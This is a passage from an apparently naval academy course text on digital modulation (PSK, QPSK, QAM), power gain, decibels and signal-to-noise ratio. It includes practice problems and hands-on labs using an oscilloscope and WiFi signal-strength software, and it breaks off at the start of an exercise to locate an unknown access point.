and each symbol represents one bit of data. For FSK and OOK, the time duration of a bit is the same as the time duration of a
symbol (Tb = Tsym).
We will soon see other digital modulation schemes where a symbol can represent more than one bit. In general, the number
of symbols for a modulation type is related to the number of bits associated with each symbol. If N is the number of bits per
symbol,
493
M = 2 N and N = log2 M.
The relationship between bits and symbols for an OOK signal is shown in the next figure for an OOK signal.
Bitrate (Rb) is the speed of transfer of data (number of bits per second). Bitrate is inversely related to bit duration
(Tb), which is the time required to transmit a single bit.
1
Rb =
Tb
Baud (also referred to as Symbol Rate) (Rsym) is the number of symbols transmitted per second, and is inversely
related to the Symbol duration (Tsym), which is the time required to transmit one symbol.
1
Rsym =
Tsym
The Bitrate and the Baud (or Symbol Rate) are related by the number of bits per symbol (N).
Rb = Rs ´ N
The bandwidth associated with OOK is what we have seen before, BW = 2Rb, as shown in the figure below.
As you’ll see shortly, the symbol rate (Rs) has a noted effect on the bandwidth required for transmission. In general, for all
digital modulation schemes that we will discuss (except for FSK), bandwidth is given by:
BW =
2Rb .
N
In the case of OOK, since N = 1 bits/symbol, BW = 2Rb = 2Rs, as stated before. For example, for OOK, if the bitrate is 600
kbps, the symbol rate is 600,000 symbols/sec, and the bandwidth is 2(600,000) = 1.2 MHz.
Phase Shift Keying (PSK)
Phase shift keying (PSK) is a form of phase modulation where the carrier’s phase shifts to one of a finite set of possible
phases based on the bits that are input. For binary phase shift keying (BPSK), the carrier phase is shifted between one of two
phases (typically 0 and 180) depending on whether a 0-bit or a 1-bit is being transmitted. For example:
0-bit: the symbol transmitted is Vc sin ( 2p fct ) .
1-bit: the symbol transmitted is Vc sin ( 2p fct +180°) = -Vc sin ( 2p fct )
It is important to point out that in PSK, the amplitude of all output symbols is the same; it is the phase of the output symbols
that are different.
494
Up to this point we have discussed digital modulation with one bit per symbol, which means that at any time, one of two
possible symbols would be transmitted. But as mentioned earlier, it is possible to have a modulation scheme with more than
one bit per symbol; this is referred to as M-ary digital modulation.
3. M-ary Digital Modulation
Before launching into more complicated digital modulation, we’ll introduce a graphical way to relate output symbols to the
bits they represent. This is called a constellation diagram. A constellation is a plot of relative amplitude and phase of the
output symbols for a digital modulation system. Each dot describes a symbol which is represented by its polar coordinates. In
terms of phase, 0° is along the positive x-axis, and phase increases as you move counterclockwise around the x-y plane.
Relative amplitude is measured as distance from the origin of the plot. The possible output symbols are represented with
filled-in circles, and adjacent to them are the bits they represent.
For example, here are two possible BPSK systems’ constellation diagrams. In BPSK, the output symbols both have the same
amplitude (both of the symbols are equidistant from the origin), but their phases are 180° apart. There are other possible
combinations of two carrier phases that might be used (such as +90° and -90°), but the actual constellation used is not
important, as long as the transmitter and receiver use the same constellation.
Note that BPSK transmits 1 bit per symbol, so only one bit value is placed next to each symbol.
If it is desired to get the information from the transmitter to the receiver faster, we need to increase the number of bits per
second (bps) that are transmitted. The cost of increasing the bitrate (besides requiring more complex components) is that it
increases the transmission bandwidth: recall that for OOK BW = 2Rb, and from Chapter 19, that bandwidth can be expensive!
Is there a way to transmit a higher bitrate but using a smaller transmission bandwidth? The answer is yes, using M-ary digital
modulation.
In M-ary modulation, we can preserve bandwidth if we keep the symbol rate the same and increase the number of bits per
symbol. For example, instead of transmitting just 2 possible phase shifts (0˚and 180˚), we could transmit one of 4 possible
phase shifts per symbol. This is called quadrature phase shift keying (QPSK).
Quadrature Phase Shift Keying (QPSK)
In QSPK, there are 4 symbols (M = 4) and there are 2 bits per symbol (N = 2 = log2M). Two of the many possible
constellation diagrams for QPSK are shown in the following figure, and the four symbols from QPSK Constellation #2 are
shown to the right of this constellation. The carrier with a phase of 0˚ is plotted in a dashed red line with each symbol for
reference. The four symbols in the righthand constellation are:
sin(2p fct + 45°), sin(2p fct +135°), sin(2p fct -135°), andsin(2p fct - 45°).
495
The following figure is a plot of the use of QPSK constellation #2 to transmit the bit stream 0001111000110110. Also shown
is the bit duration, and the symbol duration for QPSK.
The frequency spectrum for M-ary modulation schemes is shown in the figure below, which also specifies the frequency axis
for QPSK. If the bitrate is constant, the benefit of transmitting more than one bit in a symbol can be seen in the fact that the
nulls are closer to the carrier frequency.
From the figure, it is seen that the bandwidth for QPSK is given by
R ö æ
R ö
æ
BW = ç fc + b ÷ - ç fc - b ÷ = Rb Hz.
è
2ø è
2ø
This is confirmed by the equation for bandwidth for all digital modulation schemes (except for FSK),
2R
BW = b
N
where N = 2 for QPSK. For example, if bitrate is 600 kbps, BW = 2(600,000)/2=600 kHz.
M-ary PSK
We can further increase the number of bits per symbol by increasing the number of
possible phase shifts. The M in M-ary refers to the number of symbols. Consider
the 8-PSK constellation to the right (one of many possible 8-PSK constellations).
How many bits per symbol are transmitted? There are 8 symbols (M = 8), so N =
log2M = log28 = 3 bits/symbol. This is also evident from the diagram because the
three bits associated with each symbol appears next to the symbol.
What is the bandwidth for 8-PSK? Since N=3 bits/symbol, Bandwidth is given by
2R 2R
BW = b = b .
N
3
For example, if the bitrate is 600 kbps, bandwidth for 8-PSK is BW = 2(600,000)/3
= 400 kHz.
We could further increase to 4 bits/symbol using 16-PSK. Here, M = 16 and N = 4
bits/symbol. A 16-PSK constellation is shown to the right, where each phase is
separated by 360o/16 = 22.5o. More complex M-ary PSK modulation is possible: 16PSK, 32-PSK, etc., but it becomes more susceptible to noise as the symbols get
closer together. As a reminder, for PSK, all of the symbols have the same carrier
frequency and amplitude; it is their phase that is different. For that reason, on a
constellation diagram, all of the symbols for PSK appear on a circle about the origin.
496
To demodulate any type of PSK, a receiver must determine the phase of the received symbol. For
16-PSK, the receiver must determine the phase within 11.25˚, since the phases are separated by
22.5o. A portion of the constellation diagram for 16-PSK is shown to the right, indicating the wedge
of phase values that separates one of the symbols from the adjacent symbols.
Noise Effects
Recall that the number one most limiting factor in communication systems is noise. In all
transmissions, the received signal will be degraded by noise. The following figure shows a BPSK
signal and the same signal corrupted by noise. You might imagine that it is harder for a receiver to
determine the correct phase (correct symbol) that was transmitted for the noisy signal.
This noise corruption can be depicted in the constellation diagram to the
right, where the two transmitted BPSK symbols are indicated in the two
large black circles (phase = 0° and phase = 180°), and noisy received
symbols are the red and blue circles.
A BPSK receiver must make a decision to determine the phase of a
received signal to determine the corresponding bit. You may
imagine that if the noise is severe enough, a receiver might make a
mistake, and decide that it had received a 0-bit when it actually
received a 1-bit. These are called bit errors. Now, consider the
same noise in the presence of an 8-PSK signal. Is it easier for the
receiver to make bit errors?
Yes, as more phases are used in PSK, the symbols are closer
together, which makes it easier for the receiver to make bit errors
(see the figure to the right). But, of course, the advantage of more
symbols is a narrower bandwidth, if the bitrate is held constant.
There is a way to use more symbols in modulation while reducing
the chances of making bit errors; by using symbols that have
different amplitudes AND phases.
Quadrature Amplitude Modulation (QAM)
In order to increase the distance between symbols in the
constellation, another option is to modulate both the amplitude and
the phase. This is called Quadrature Amplitude Modulation (QAM)
8-QAM
An 8-QAM constellation is shown below (one of many possible 8-QAM constellations). The eight symbols along with the 3bit digital words corresponding to each are shown to the right of the constellation. This system uses 2 possible amplitudes
and 4 possible phases. In 8-QAM, the duration of a symbol is three times the duration of a bit (since each symbol carries 3
bits). Note that there are both phase and amplitude changes for each symbol.
497
What is the bandwidth for 8-QAM? The same as for 8-PSK, since the bandwidth for all digital modulation types (except for
FSK) is given by
2R
BW = b
N
And it doesn’t stop there.
Higher level QAM signals
QAM signals can be extended to have a larger number of signal symbols, which then gives a much higher bit rate (because
there are more bits per symbol). 64-QAM and 256-QAM are common in cable modems, satellites, and high-speed fixed
broadband wireless.
In 256-QAM, you find that for each symbol you are transmitting (there are 256 symbols), there are 8 bits of information.
Assuming the symbol rate remains constant, that means that for the same bandwidth, you are sending 8 times more
information when you use 256-QAM than when you use OOK, FSK, or BPSK. For 256-QAM, if the bitrate is 600 kbps, the
bandwidth is 2(600,000)/8 = 150 kHz.
Now that’s powerful!
498
Practice Problem 22.3
90˚
Using the signal constellation shown, answer the following questions.
a)
What type of modulation does this represent?
b) How many symbols are represented (M)?
180˚
c)
0˚
How many bits per symbol are used (N)?
d) If the Baud Rate is 10,000 symbols/second, what is the bit rate (Rb)?
e)
Would 16-QAM be more or less susceptible to noise than this type of modulation?
270˚
Practice Problem 22.4
Label the modulation schemes.
(there are 2 symbols here)
(there are 4 symbols here)
499
500
Problems
1.
For an ASCII ‘Z,’ sketch both the On-Off Keying (OOK) binary waveform (voltage pulses) and the modulated signal,
where the amplitude of the carrier is modulated to either 10 V or 0 V and Tb = 100 ms. Hint: use the ASCII table from
Chapter 1 of the course notes to determine the bits that represent ‘Z’.
2.
Given this FSK transmission where individual symbols are denoted
by vertical lines:
a. Draw the corresponding binary transmission (voltage pulses),
assuming that the higher frequency represents a 1-bit:
3.
b.
Determine the bit rate.
c.
How many bits per symbol could be conveyed if four different
frequencies were used to transmit data instead of two (that is, if
4 symbols were used vice 2 symbols)?
The following is a BPSK transmission. The dashed vertical lines separate the bits.
On this plot, a binary ‘1’ is represented by this signal:
a.
Determine the transmitted bits.
b.
Determine the bit rate.
c.
What is the bandwidth for this transmission?
4.
QAM is a combination of which two types of modulation?
5.
The “forward” signal transmitted to control a remotely-controlled (RC) car is captured on an oscilloscope
and displayed below.
Answer the following questions with regards to this signal:
a.
This modulation is binary, meaning that there are two possible symbols. What type of digital modulation is
being used?
501
6.
b.
What is the bit rate? (Hint: Two time cursors are shown on the display as the two dashed vertical lines…these
cursors isolate a single bit. Also shown are some measurements about the time cursors below the plot and to the
c.
What bit sequence is represented by the O-scope display?
16-QAM can be used for higher data rate transmissions.
a.
How many bits are transmitted with each symbol?
b.
If 4 different phases and 4 different amplitudes are used in a 16-QAM modulation system, sketch a constellation
diagram that could be associated with the system (you do not need to label the bits for each symbol, just show
the symbols).
c.
If 8 different phases and 2 different amplitudes are used in a 16-QAM modulation system, sketch a constellation
diagram that could be associated with the system(you do not need to label the bits for each symbol, just show
the symbols).
d.
If the bit rate associated with either of these 16-QAM systems was 1.2 Mbps, what is the bandwidth of the
transmission?
7.
For a given bandwidth system, what is the advantage and disadvantage of using a multi-symbol encoding scheme (that
is, using more than 2 symbols)?
8.
A communication system transmits 100 kbps. For each of the following modulation types, determine the bandwidth of
the transmission.
9.
a.
FSK, with frequency deviation 200 kHz.
b.
OOK.
c.
QPSK.
d.
16-PSK.
e.
16-QAM.
f.
512-QAM.
Suppose the FCC has leased you the portion of the frequency spectrum from 1.2 MHz to 1.3 MHz for your free-space
communication system. What is the maximum bitrate you could obtain if you used the following modulation schemes:
a.
FSK, with fmark = 1.23 MHz and fspace = 1.27 MHz.
b.
ASK.
c.
BPSK.
d.
8-PSK.
e.
32-QAM.
f.
256-QAM.
502
Security Exercise 22
Digital Modulation: OOK and FSK
Discussion: A baseband signal is not compatible with free-space communication. Therefore, we need to modulate the binary
0s and 1s. Digital modulation is different from analog modulation in that the analog carrier signal is modulated by voltage
pulses that represent 0s and 1s.
Objective: To provide hands on experience and further familiarize each Midshipman with some of the aspects of the simplest
form of Amplitude Shift Keying (ASK), known as On Off Keying (OOK), as well as Frequency Shift Keying (FSK).
I. On-Off Keying (OOK)
In OOK, the amplitude of the digital signal controls the carrier signal, so that the carrier is turned on to represent a 1-bit and
turned off to represent a 0-bit.
Using your familiarity with the oscilloscope ( o-scope) and function generator from your previous labs, set up the Function
Generator with the following settings:
□
□
□
□
□
□
□
□
□
□
□
□
Press the Utility button and set your Output Setup to High Z.
Select the sinusoidal function by pressing the Sine button.
o Freq = 300 kHz (this will be the carrier frequency, fc)
o Ampl = 1 Vrms
Push Mod button with the following settings:
o
o
o
o
o
TYPE = AM
SOURCE = Int
AM Depth = 100%
AM Freq = 10 kHz (this will be the bit rate)
SHAPE = Square
Connect the function generator Output (red to red, black to black) to CH 1 of the o-scope
Connect the function generator Sync (red to red) to CH2.
Push Output button to send the signal to the o-scope.
Push AUTOSET on the o-scope.
Adjust the o-scope with CH 2 on top (square wave) and CH 1 (carrier) on the bottom using the vertical positions on
CH1 and CH2.
Push the Trig Menu button on the o-scope and use the following settings:
o TYPE = Edge
o SOURCE = CH 2
o SLOPE = Rising
o MODE = Auto
o Coupling = AC
Note: You may need to adjust the Trigger level arrow to stabilize your display.
Push CH 1 MENU to return.
Adjust the horizontal range and vertical ranges to 25 µsec per division,
Adjust CH 1 and CH 2 vertical scale (volts/div) so that you see a display similar to the Fig. 1 that follows.
Note: Your scope display should look similar to Figure 1, below, except your digital signal is a square wave, 101010…
Figure 1
503
Question 1: Looking at CH1 and using the time cursors, measure carrier period and then calculate the carrier
frequency, fc. Recall that the carrier is the rapidly changing sinusoid.
Question 2: Looking at CH2, measure the bit duration Tb, then calculate the bitrate, Rb.
□
Change the o-scope to display the frequency domain by choosing MATH MENU and using the following settings:
o
o
o
OPERATION = FFT
SOURCE = CH 1
50 kHz per Division
The o-scope should look similar to the Figure 2 below.
Figure 2
Question 3: Find the carrier frequency from the o-scope display (hint: use the frequency cursor).
□
Use the frequency cursors to measure the bandwidth (hint: the bandwidth is determined by the first null to the left
and right of the carrier).
Question 4: What is the bandwidth of the OOK signal (when fm = 10 kHz—that is, when Rb = 20 kbps)?
□
□
Change the AM Freq on the frequency generator to 20 kHz (so you are increasing your bit rate to 40 kbps).
Measure the bandwidth of the signal between the first pair of sideband, as done in the previous step.
Question 5: Now, What is the bandwidth of the OOK signal (when fm = 20 kHz)?
Question 6: Based on the Questions 5 and 6, as the bit rate increases describe what happens to the bandwidth of the
signal? Remember that the equation for the bandwidth of an OOK signal is
BW =
2Rb
.
N
Your findings should be supported by this equation!
II. Frequency Shift Keying (FSK)
Frequency shift keying (FSK) is another digital modulation technique in which a continuous sine wave changes frequency
when the digital bit stream changes between zero and one. The higher frequency represents a binary ‘1’ (also called mark)
and the lower frequency represents a binary ‘0’ (also called space). FSK is used primarily in low speed applications (<500
Kbps) and noisy environments where accuracy is preferred over speed.
Keep the carrier frequency the same (fc is still 300 kHz), but change the modulation mode to FSK using the following steps:
□
□
Use the following modulation settings on the function generator (Mod):
o TYPE = FM
o SOURCE = Int
o FREQ DEV = 200 kHz (this is frequency deviation, Δf).
o FM Freq = 10 kHz (this is the bit rate, Rb).
o SHAPE = Square
Push CH 1 MENU on the o-scope to return to the time domain.
504
□
Set horizontal scale to 25 µs per division.
Note: Your display should look similar to Figure 3, below, where a 1-bit is represented by a sinusoid with a frequency
higher than the carrier’s (called the mark frequency) and a 0-bit with a frequency lower than the carrier’s (called the
space frequency).
Figure 3
□
Adjust the picture on the o-scope to answer the next question by changing the horizontal range setting (sec/div) and
using the time cursors to measure the periods of the two sinusoids.
Question 7: What is the mark frequency, fmark? What is the space frequency, fspace?
□
□
To see the difference in the bandwidth for the FSK signal, shift to the frequency domain. Push the MATH MENU
button and use the following settings:
o OPERATION = FFT
o SOURCE = CH 1
o 125 KHz per Division
Measure the bandwidth between the sidebands (approximately) as shown in Figure 4. This is based on the first peak
to the left of fspace and the first peak on the right of fmark.
Figure 4
Question 8: What is the measured bandwidth (hint: your answer should be much larger than your answer for the
OOK bandwidth) ? Remember that the equation for the bandwidth of an FSK signal is
BW = ( fmark + Rb ) - ( fspace - Rb ) = fmark - fspace + 2Rb
or
BW = 2(Df + Rb )
Your answer should be supported by this equation!
□
Change the FM FREQ to 20 kHz (now Rb = 40 kbps) and measure the bandwidth of the signal as shown in Fig. 4.
Question 9: What is the new bandwidth?
Question 10: Based on the above change, as the bit rate (Rb) increases, describe what happens to the bandwidth of
the signal. What can you say about the comparisons of the bandwidths for FSK as compared to OOK?
□
Turn off your equipment and clean up your lab bench.
505
506
Security Exercise 22 Answer Sheet
Name:
_________________________________________________________________________________________________
Question 1:
_________________________________________________________________________________________________
Question 2:
________________________________________________________________________________________________
Question 3:
________________________________________________________________________________________________
Question 4:
_________________________________________________________________________________________________
Question 5:
_________________________________________________________________________________________________
Question 6:
_________________________________________________________________________________________________
Question 7:
_________________________________________________________________________________________________
Question 8:
_________________________________________________________________________________________________
Question 9:
_________________________________________________________________________________________________
Question 10:
_________________________________________________________________________________________________
507
508
Chapter 23: Power Gain and SNR
Objectives:
(m) Define gain and attenuation and describe their application to communications.
(n) Calculate power gains for single and multiple stage systems; determine power at each stage.
(o) Express power gain in dB, and power levels in dBW and dBm. Compute power gain and power from dB, dBW and dBm.
(p) Calculate signal to noise ratio (SNR) and discuss the impact of noise in a communication system.
Connection to Cyber Security
Communication systems transmit electrical (EM) signals to convey information. The strength of a signal is based on its
electrical power, and the transmit power is an important consideration in how far a signal can be transmitted through the
atmosphere. In addition, the received power is important factor in how accurately an information signal can be recovered; if
the received power is not high enough to overcome the noise present, then information will be lost. Cyber security attacks
against wireless communication systems can take advantage of the frequencies and modulation types of the transmission
(Chapter 22), but also the power that is received by a receiver. These attacks take the form of jamming, and possibly taking
control of devices that are controlled via a wireless communication link if the received control signals from the actual
transmitter are weaker than the received power from a hacker’s signal. In 2011, Iran captured a US unmanned aerial vehicle
(UAV) while inflight, claiming that their cyberwarfare unit had commandeered and safely landed the UAV. This chapter
introduces the power aspects of wireless communication.
1. Gain/Attenuation.
Electrical power is measured in Watts (W), and your typical flat screen TV uses maybe 250 W while it is on, and your laptop
may use 60 W while it is running heavy-duty programs. In wireless communications, it may take an incredibly large transmit
power to cover the distance to the receiver, and even then, the power arriving at the receiver may be incredibly small. For
example, a commercial FM station may transmit 15.5 kW of signal power to reach your car’s radio, and by the time it gets to
your car’s antenna, the received power may be on the order of 1 pW (10 -12 Watts). This means that the transmitted power has
dropped by a factor of approximately 10 16. Consider a satellite ground station (on Earth), transmitting to another ground
station on the other side of the Earth via a geostationary satellite, 22,300 miles away. This is an immense distance to transmit
over to reach the satellite! How about NASA’s New Horizon space probe mission currently on its way to the planet Pluto…it
will be transmitting information back to Earth nearly 4 billion miles away!
So how are you going to get your signal to travel further? Turn up the power. But modulators that produce PSK or QAM
typically do not produce signals of substantial power; instead we use devices called amplifiers to increase the power of the
modulated signals (that is, to amplify them) so that they are strong enough to cover the required distances.
The term power gain refers to the factor that the power is increased in a signal as it goes through an amplifier. The power
gain (AP) is the ratio of the output signal power to the input signal power. In a block diagram of a communication system, an
amplifier is typically drawn as a triangle (although rectangular blocks are also used), as in the following figure. To calculate
power gain (AP) where Pin is the power input and Pout is the power output, we use the equation:
AP =
Pout .
Pin
An amplifier can take a modulated signal and increase its power large enough to transmit many miles, much like the above
example of a FM radio broadcasting tower transmitting at 15.5 kW.
There are, however, some components of communication systems can also reduce the power of a signal. Reduction of the
power of a signal (signal loss) is termed attenuation. Attenuation is still computed using the equation for power gain, but a
component that attenuates has a power gain that is less than 1.0.
509
Putting together what we’ve learned, we have our modulated signal feeding into an amplifier that increases the power of the
signal. The signal is broadcast out of the transmitter via an antenna, where the signal is attenuated as it travels through the air
to the receiver’s antenna. Finally the significantly reduced signal is picked up by the receiver, and the receiver recovers the
information. This is depicted in the following diagram for an ASK system.
Practice Problem 23.1
The input power of an amplifier is 6 W. The power gain is AP = 80. What is the output power?
Practice Problem 23.2
The input power is 15.5 kW. The power output is 10 -15 W. Is this system associated with amplification or attenuation? What
is the gain (or attenuation) of this system?
You may have noticed that there can be a large disparity in the power values between transmitter and receiver, and dealing
with incredibly large and incredibly small values in the same system is challenging. For this reason, in many cases we deal
with decibel values instead of the numeric values.
2. Decibels.
As engineers, we just want our lives to be as easy as possible. So rather than work with these terribly tedious numbers, we
often convert the numbers into decibels (dB). The decibel is a logarithmic measure that provides more convenient gain and
attenuation values by changing them to a logarithmic scale. The benefit of a log scale is that it can map a very large range of
decimal values into a small range of decibel values. Consequently, small changes in decibel quantities may mean very large
changes in power (we’ll revisit this in the accompanying security exercise). To convert a decimal value X into decibel value
XdB is given by:
XdB = 10 log10 (X) .
If X is a value greater than 1.0, then XdB will be a positive value, and if X is a value less than 1.0, XdB will be a negative value.
The decibel value of zero is negative infinity and the decibel is undefined for negative values.
For power gain (or attenuation) then:
510
æP ö
AP,dB = 10 log10 (AP ) = 10 log10 ç out ÷ .
è Pin ø
So then for the above practice problem that gave us a headache, we see:
æP ö
æ 0.000000000000001 W ö
AP,dB = 10 log10 ç out ÷ = 10 log10 ç
÷ø = -181.9 dB
è
15,500 W
è Pin ø
Practice Problem 23.3
Convert these two power gains to decibels (dB).
AP =1000
AP =0.0001
A couple of very common values of power gain are 2 and ½. A power amplification by a factor of two (AP = 2) will result in a
power gain of +3 dB.
AP,dB = 10log10 (AP ) = 10log10 (2) = +3 dB
An attenuation by a factor of one-half will result in a power gain of -3 dB.
AP,dB = 10log10 (AP ) = 10log10 (0.5) = -3 dB
How do you find the decimal value corresponding to a decibel value? Just rearrange the dB equation from earlier and you get:
AP,dB = 10 log10 (AP )
AP = 10
( AP )dB
10
Practice Problem 23.4
Convert the following power gains from decibels to decimal gains.
AP,dB = 25 dB: AP =
AP,dB = -6 dB: AP =
Power gain is a ratio of two powers, Pin and Pout, each with a unit of power, usually W or mW. When taking this ratio, the
units of power cancel, and you’re taking the log of a unitless ratio. Logarithms only work with numbers, not units. In
communications, we are sometimes asked to compute the decibel value of a power level (in W or mW). In this case, you will
take the log of that power level with respect to a fixed reference power level, either 1 W or 1 mW so that the units cancel and
you’re just taking the log of a number.
dBm: The number of decibels of power relative to 1 mW. The reference power level is 1 mW and the dBm value is expressed
mathematically as
æ P ö
æ PW ö .
PdBm = 10 log10 ç mW ÷ or PdBm = 10 log10 ç
è 1 mW ø
è 0.001 W ÷ø
511
If the power value to compute is already in mW, the first equation can be used, and if the power value is in W, then the second
equation can be used. In this case, since 1 mW = 0.001 W, the units will cancel.
dBW: The number of decibels of power relative to 1 W. The reference power level is 1 W and the dBW value is expressed
mathematically as
æ P ö
PdBW = 10 log10 ç W ÷ .
è 1 Wø
In all cases, the units of power must cancel so that the resulting ratio is unitless.
Also, if given a dBm or dBW value, the power in mW or W can be found from:
P(in mW) = 10
P ( dBm )
10
or P(in W) = 10
P ( dBW )
10
.
Practice Problem 23.5
Express Pin = 2 W in decibels as both dBm and dBW.
Pin,dBm =
Pin,dBW =
Practice Problem 23.6
Express 25 dBm in terms of mW and W.
P(in mW) =
P(in W) =
Besides compressing a large range of values into a smaller range of decibel values, another benefit from using decibels is the
mathematics involved in combining decibel terms; decibel values are added or subtracted instead of multiplying or dividing.
This is typically seen in communication systems that cascade amplifiers as in the following figure. Here, the output power
after each amplifier is computed as the product of the power into that amplifier and its power gain.
So, if we leave the gains in ratio form, then the total gain of the system will be the product of all the gains multiplied together,
and we could rewrite this cascade of three amplifiers as a single amplifier with power gain AT.
In terms of decibels, the overall decibel gain of a cascade of amplifiers can be found as follows:
AT ,dB = 10log10 (AT ) = 10log10 ( AP1 × AP2 × AP3 ) .
512
Using the property of the log function that the log of a product is the sum of the logs, we have:
AT ,dB = 10 log10 ( AP1 × AP 2 × AP 3 )
= 10 log10 (AP1 ) +10 log10 (AP 2 ) +10 log10 (AP 3 )
= AP1,dB + AP 2,dB + AP 3,dB
Also, we could use the property of the log function that the log of a quotient is the difference of the logs to write the
following equation:
.
In this equation, the input and output powers must be in the same decibel units, either dBW or dBm. Note that the difference
between two dBm or dBW values will result in a dB value. Applying the log of products property to a cascaded system of
amplifiers,
Pout , dBm = 10 log10 ( Pin × AP1 × AP2 × AP 3 )
= 10 log10 (Pin ) + 10 log10 (AP1 ) +10 log10 (AP 2 ) + 10 log10 (AP 3 )
= Pin, dBm + AP1,dB + AP2,dB + AP 3,dB .
Here, it is okay that dB and dBm are mixed on the right side of the equation, because all of the decibel values represent
unitless numbers; it’s just that the input and output power values’ decibel values must be computed relative to 1 mW. If the
input and output powers are in W instead of mW,
Pout ,dBW = Pin,dBW + AP1,dB + AP2,dB + AP3,dB .
Adding and subtracting decibels can be a much simpler operation than multiplying and dividing very large or very small
decimal numbers. A common mistake midshipmen make when dealing with decibel values is that you should NEVER,
EVER multiply or divide decibel values. Decibels are always added or subtracted from other decibels.
Practice Problem 23.7
The diagram below represents the first three stages of a typical AM or FM receiver. Find the following quantities.
(a) AT and AT,dB
(b) AP1,dB, AP2,dB, and AP3,dB.
(c) P1, P2, and Pout.
(d) Pin,dBm, P1,dBm, P2,dBm, and Pout,dBm.
513
3. Noise and the Signal-to-Noise Ratio (SNR)
Recall from Chapter 19 that noise is one of the principle limiting factors in the performance of communication systems, and
that noise is added to our signal from external sources in the communication channel and also from internal (electronic) sources
within our own system’s hardware.
As we saw in Chapter 22, if significant enough, it can mask the original signal such that the signal becomes unrecoverable, or
in the case of digital modulation, that bit errors can occur. This noise effect is not much different than if an enemy were to
flood the air waves with an erroneous signal at the same frequency on which you were transmitting. If that erroneous signal
was stronger at the receiver than your signal, your signal would become unrecoverable.
How do we know the effect of noise on the signal, or the quality of the received signal in the face of noise? We use the
signal-to-noise ratio (S/N, also referred to as SNR), which is the ratio of the power of a signal to the power of the noise
corrupting that signal. A strong signal in weak noise results in a high SNR. A weak signal in strong noise results in a low
SNR. Below are four samples of a sine wave with various amounts of noise added.
The signal-to-noise ratio indicates the relative strengths of the signal and the noise in a communication system. The stronger
the signal and the weaker the noise, the higher the SNR. Mathematically, SNR is defined as:
SNR =
æPö
Ps
and SNR dB = 10 log10 ç s ÷ .
Pn
è Pn ø
Practice Problem 23.8
The signal power at the input to a receiver is 6.2 nW and the noise power at the input to that receiver is 1.8 nW. Find SNR and
SNRdB.
514
Problems
1.
Convert power gains of 100, 1000 and 2000 to decibel values.
2.
Convert power gains of 0.01, 0.001, and 0.0005 to decibel values.
3.
Convert decibel power gains of 13 dB, 33 dB, and 103 dB to power gains.
4.
Three amplifiers with gains of 12.5, 4, and 20 are cascaded as shown in the following diagram (from left to right).
The input power is 120 mW. What is the overall gain and the output powers of each stage?
5.
A power amplifier has an output power of 200 W and an input power of 8W. What is the power gain in decibels?
6.
A power amplifier has a gain of 55 dB. The input power is 600 mW. What is the output power in W?
7.
An amplifier has an output power of 5W. What is this amount of power in dBm?
8.
A communication system has five stages, with gains and attenuations of 12 dB, -45 dB, 68 dB, -31 dB and 9 dB.
a. What is the overall gain in dB (AT,dB)?
b. The overall power gain (AT)?
c. If the input power is 1 dBm, what is the output power in dBm?
9.
The signal input power to a receiver is 6 W. The noise power is 25 mW. What is the SNR? What is SNR dB?
10.
A receiver’s sensitivity is the minimum received signal power for the receiver to successfully recover the transmitted
signal. If a receiver’s sensitivity is -45 dBm, and the received power is 10 μW, will the receiver be able to recover
the transmitted signal?
515
516
Security Exercise 23
Introduction to Wireless Signals
Discussion: In the wireless section of the course so far, you have learned that we transmit information using EM waves in
free space. If we encode some meaningful data onto these waves, we can communicate without being physically tethered to
the medium. But how far away can we be? How close to the transmitter must we be in order to receive the message and
successfully recover the information?
Just like our human voice only travels so far when we shout, radio waves only travel so far from the transmitting station. At
some point, you will just be out of range.
Fortunately, we can measure the strength of the transmitter (how loud it can “shout”) and the sensitivity of a receiver (how
quiet a sound it can still “hear”) When we put these measurements on a logarithmic decibel scale and compare their utility,
we can figure out things like:
What is the optimal location for a transmitter?
Where is the best spot to get reception?
Which devices receive a better signal?
These are things you probably do with your cell phone all the time. Today we will do an experiment and see if we can
answer these questions scientifically.
Objective: To provide hands on experience and further familiarize each Midshipman with power measurements in a wireless
communication system, and the effects of distance from the transmitter to the receiver.
Set-up.
Equipment required:
Your issued Laptop
Xirrus software:
I. Measuring Signal Strength from your Local WiFi
□
□
On your laptop, check the wireless connections and you should see a list of devices. One of the devices is the
wireless Access Point (AP) in your classroom named cyber2_xx. The xx is your room number. If you do not see the
specific AP for your room, tell your instructor.
Once you see your cyber2 AP, start Xirrus Wi-Fi Inspector by double clicking the icon on your desktop. Let’s
explore the Xirrus Graphical User Interface (GUI) shown on the next figure. You should identify each of the
following parts on the display (identified with letters a-e) and then perform any specific instructions on your laptop.
a) Start by clicking on settings and turning “Locate Sound” to Off. Click OK.
b) In the upper left is the “Radar Display.” This shows the relative signal strength of an AP. The stronger the AP,
the closer it is to the middle of the display. It doesn’t correlate with specific direction of the AP relative to you,
but it will converge to the center as strength increases.
c) In the center top is “Connections” which lists the details of the AP you are connected to.
d) Below that is “Networks” which lists of all the AP’s you can observe with their respective data.
e) “Signal History” is a time versus signal strength (in dBm) graph of the AP you are trying to locate. Highlight
the cyber2_xx node, then right click and choose locate cyber2_xx and you should see it appear on the signal
history plot.
517
Question1: For your cyber2_xx AP, write the following details down on the lower left corner of the map on the solution
page.
SSID (Service Set Identifier) - the wireless network name
BSSID (Basic Service Set Identifier) - the MAC address of the wireless interface unit
Channel - allows the carrier frequency to be separated into bands to keep from overlapping
Frequency - carrier frequency the AP is using for communications
□
Now that we have Xirrus running, we can take some measurements of the signal strength. Look at the Networks
display list in the middle (d above), find your AP, highlight it and note the dBm.
Question 2: Record the signal strength noted for your AP on the table on the last page of the lab under classroom.
Question 3: Assume you record the signal strength of some other fictional access point when you are standing next to it
as -30 dBm. Next, you walk some distance away from it and take another signal strength measurement and record it as 33 dBm. By what factor has the signal strength dropped from measurement one to measurement two? (Hint: convert
each measurement to mW then divide measurement two by measurement one). Recall that:
P(in mW) = 10
P ( dBm )
10
Keep this realization in mind when answering the following questions:
A SMALL CHANGE IN DECIBELS CAN MEAN A LARGE CHANGE IN POWER!
Question 4: Staying highlighted on your assigned AP, move from point to point on the map and record the signal
strength (dBm), allowing a period of time to let the value settle. Note if the dBm falls much below -90 it may drop from
your list. You can locate it again by returning closer to the classroom. Simply record -90 dBm if your AP is lost at
any point on the map.
Question 5: Convert your dBm measurements to mW and finish filling in the table.
Question 6: Observations:
a)
b)
c)
d)
At what locations did you receive the strongest signal?
The weakest signal?
Would you expect to stay connected to this AP in Maury Hall? Why?
Have an instructor check your results.
518
2. The Hunt for an Unknown AP
□
Understanding how Xirrus reads signal strength, we will now try to locate an unknown AP using the Xirrus
program. This AP is not located in your classroom, but you should be able to pick up the signal in your hallway.
